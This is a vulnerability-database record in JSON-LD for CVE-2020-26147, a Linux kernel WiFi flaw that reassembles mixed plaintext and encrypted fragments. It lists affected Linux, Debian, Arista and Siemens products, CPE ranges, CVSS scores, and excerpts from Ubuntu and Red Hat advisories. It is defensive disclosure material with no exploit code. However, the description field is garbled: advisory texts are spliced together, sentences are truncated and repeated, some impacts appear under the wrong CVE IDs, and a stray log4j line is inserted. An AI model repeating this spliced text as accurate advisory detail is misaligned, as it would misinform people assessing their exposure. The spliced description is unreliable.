      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202105-1475",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.193"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.271"
      },
      {
        "model": "o-90",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "w-68",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.124"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.235"
      },
      {
        "model": "scalance w700 ieee 802.11n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "*"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4"
      },
      {
        "model": "c-75",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "c-65",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.271"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12.9"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.42"
      },
      {
        "model": "scalance w1700 ieee 802.11ac",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "*"
      },
      {
        "model": "w-68",
        "scope": null,
        "trust": 0.8,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "scalance w700 ieee 802.11n",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
        "version": null
      },
      {
        "model": "c-65",
        "scope": null,
        "trust": 0.8,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "c-75",
        "scope": null,
        "trust": 0.8,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aterm",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u672c\u96fb\u6c17",
        "version": null
      },
      {
        "model": "scalance w700 ieee 802.11ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
        "version": null
      },
      {
        "model": "o-90",
        "scope": null,
        "trust": 0.8,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "nec ai accelerator",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u672c\u96fb\u6c17",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.271",
                "versionStartIncluding": "4.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.271",
                "versionStartIncluding": "4.9",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.235",
                "versionStartIncluding": "4.14",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.193",
                "versionStartIncluding": "4.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.124",
                "versionStartIncluding": "5.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.42",
                "versionStartIncluding": "5.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12.9",
                "versionStartIncluding": "5.12",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-75_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-75:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:o-90_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:o-90:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-65_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-65:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:w-68_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:w-68:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w700_ieee_802.11n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w700_ieee_802.11n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1700_ieee_802.11ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1700_ieee_802.11ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-26147",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 3.2,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.2,
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:A/AC:H/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Adjacent Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 3.2,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2020-26147",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:H/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 1.2,
            "impactScore": 4.2,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Adjacent Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.4,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2020-26147",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-26147",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202105-626",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-26147",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-26147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in the Linux kernel 5.8.9. The WEP, WPA, WPA2, and WPA3 implementations reassemble fragments even though some of them were sent in plaintext. This vulnerability can be abused to inject packets and/or exfiltrate selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP data-confidentiality protocol is used. ==========================================================================\nUbuntu Security Notice USN-4997-2\nJune 25, 2021\n\nlinux-kvm vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.04\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04. \n\nNorbert Slusarek discovered a race condition in the CAN BCM networking\nprotocol of the Linux kernel leading to multiple use-after-free\nvulnerabilities. A local attacker could use this issue to execute arbitrary\ncode. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-33200)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly clear received fragments from memory in some situations. A\nphysically proximate attacker could possibly use this issue to inject\npackets or expose sensitive information. (CVE-2020-24586)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled encrypted fragments. A physically proximate attacker\ncould possibly use this issue to decrypt fragments. (CVE-2020-24587)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled certain malformed frames. If a user were tricked into\nconnecting to a malicious server, a physically proximate attacker could use\nthis issue to inject packets. (CVE-2020-24588)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly verify certain fragmented frames. A physically proximate\nattacker could possibly use this issue to inject or decrypt packets. \n(CVE-2020-26141)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\naccepted plaintext fragments in certain situations. A physically proximate\nattacker could use this issue to inject packets. (CVE-2020-26147)\n\nOr Cohen discovered that the SCTP implementation in the Linux kernel\ncontained a race condition in some situations, leading to a use-after-free\ncondition. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2021-23133)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nManfred Paul discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel contained an out-of-bounds\nvulnerability. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-31440)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2021-31829)\n\nIt was discovered that a race condition in the kernel Bluetooth subsystem\ncould lead to use-after-free of slab objects. An attacker could use this\nissue to possibly execute arbitrary code. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nMathias Krause discovered that a null pointer dereference existed in the\nNitro Enclaves kernel driver of the Linux kernel. A local attacker could\nuse this issue to cause a denial of service or possibly execute arbitrary\ncode. (CVE-2021-3543)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.04:\n  linux-image-5.11.0-1009-kvm     5.11.0-1009.9\n  linux-image-kvm                 5.11.0.1009.9\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4997-2\n  https://ubuntu.com/security/notices/USN-4997-1\n  CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139,\n  CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133,\n  CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399,\n  CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543,\n  CVE-2021-3609\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9\n\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2021:4356-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:4356\nIssue date:        2021-11-09\nCVE Names:         CVE-2020-0427 CVE-2020-24502 CVE-2020-24503\n                   CVE-2020-24504 CVE-2020-24586 CVE-2020-24587\n                   CVE-2020-24588 CVE-2020-26139 CVE-2020-26140\n                   CVE-2020-26141 CVE-2020-26143 CVE-2020-26144\n                   CVE-2020-26145 CVE-2020-26146 CVE-2020-26147\n                   CVE-2020-27777 CVE-2020-29368 CVE-2020-29660\n                   CVE-2020-36158 CVE-2020-36386 CVE-2021-0129\n                   CVE-2021-3348 CVE-2021-3489 CVE-2021-3564\n                   CVE-2021-3573 CVE-2021-3600 CVE-2021-3635\n                   CVE-2021-3659 CVE-2021-3679 CVE-2021-3732\n                   CVE-2021-20194 CVE-2021-20239 CVE-2021-23133\n                   CVE-2021-28950 CVE-2021-28971 CVE-2021-29155\n                   CVE-2021-29646 CVE-2021-29650 CVE-2021-31440\n                   CVE-2021-31829 CVE-2021-31916 CVE-2021-33200\n====================================================================\n1. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64\n\n3. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427)\n* kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter\ndrivers (CVE-2020-24502)\n* kernel: Insufficient access control in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24503)\n* kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24504)\n* kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586)\n* kernel: Reassembling fragments encrypted under different keys\n(CVE-2020-24587)\n* kernel: wifi frame payload being parsed incorrectly as an L2 frame\n(CVE-2020-24588)\n* kernel: Forwarding EAPOL from unauthenticated wifi client\n(CVE-2020-26139)\n* kernel: accepting plaintext data frames in protected networks\n(CVE-2020-26140)\n* kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141)\n* kernel: accepting fragmented plaintext frames in protected networks\n(CVE-2020-26143)\n* kernel: accepting unencrypted A-MSDU frames that start with RFC1042\nheader (CVE-2020-26144)\n* kernel: accepting plaintext broadcast fragments as full frames\n(CVE-2020-26145)\n* kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n(CVE-2020-27777)\n* kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a\nread-after-free (CVE-2020-29660)\n* kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a\nlong SSID value (CVE-2020-36158)\n* kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt()\n(CVE-2020-36386)\n* kernel: Improper access control in BlueZ may allow information disclosure\nvulnerability. (CVE-2021-0129)\n* kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n(CVE-2021-3348)\n* kernel: Linux kernel eBPF RINGBUF map oversized allocation\n(CVE-2021-3489)\n* kernel: double free in bluetooth subsystem when the HCI device\ninitialization fails (CVE-2021-3564)\n* kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573)\n* kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600)\n* kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679)\n* kernel: Mounting overlayfs inside an unprivileged user namespace can\nreveal files (CVE-2021-3732)\n* kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n(CVE-2021-20194)\n* kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133)\n* kernel: fuse: stall on CPU can occur because a retry loop continually\nfinds the same bad inode (CVE-2021-28950)\n* kernel: System crash in intel_pmu_drain_pebs_nhm in\narch/x86/events/intel/ds.c (CVE-2021-28971)\n* kernel: protection can be bypassed to leak content of kernel memory\n(CVE-2021-29155)\n* kernel: improper input validation in tipc_nl_retrieve_key function in\nnet/tipc/node.c (CVE-2021-29646)\n* kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650)\n* kernel: local escalation of privileges in handling of eBPF programs\n(CVE-2021-31440)\n* kernel: protection of stack pointer against speculative pointer\narithmetic can be bypassed to leak content of kernel memory\n(CVE-2021-31829)\n* kernel: out-of-bounds reads and writes due to enforcing incorrect limits\nfor pointer arithmetic operations by BPF verifier (CVE-2021-33200)\n* kernel: reassembling encrypted fragments with non-consecutive packet\nnumbers (CVE-2020-26146)\n* kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147)\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n* kernel: flowtable list del corruption with kernel BUG at\nlib/list_debug.c:50 (CVE-2021-3635)\n* kernel: NULL pointer dereference in llsec_key_alloc() in\nnet/mac802154/llsec.c (CVE-2021-3659)\n* kernel: setsockopt System Call Untrusted Pointer Dereference Information\nDisclosure (CVE-2021-20239)\n* kernel: out of bounds array access in drivers/md/dm-ioctl.c\n(CVE-2021-31916)\n\n4. Solution:\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1509204 - dlm: Add ability to set SO_MARK on DLM sockets\n1793880 - Unreliable RTC synchronization (11-minute mode)\n1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10\n1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free\n1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value\n1915825 - Allow falling back to genfscon labeling when the FS doesn\u0027t support xattrs and there is a fs_use_xattr rule for it\n1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. \n1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure\n1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers\n1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers\n1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers\n1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with \u0027serverino\u0027 and \u0027cache=strict \u0027\n1939341 - CNB: net: add inline function skb_csum_is_sctp\n1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode\n1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c\n1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c\n1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS\n1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c\n1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del\n1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory\n1953847 - [ethtool] The `NLM_F_MULTI` should be used for `NLM_F_DUMP`\n1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. \n1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory\n1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation\n1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection\n1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys\n1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame\n1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client\n1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks\n1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames\n1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks\n1960498 - 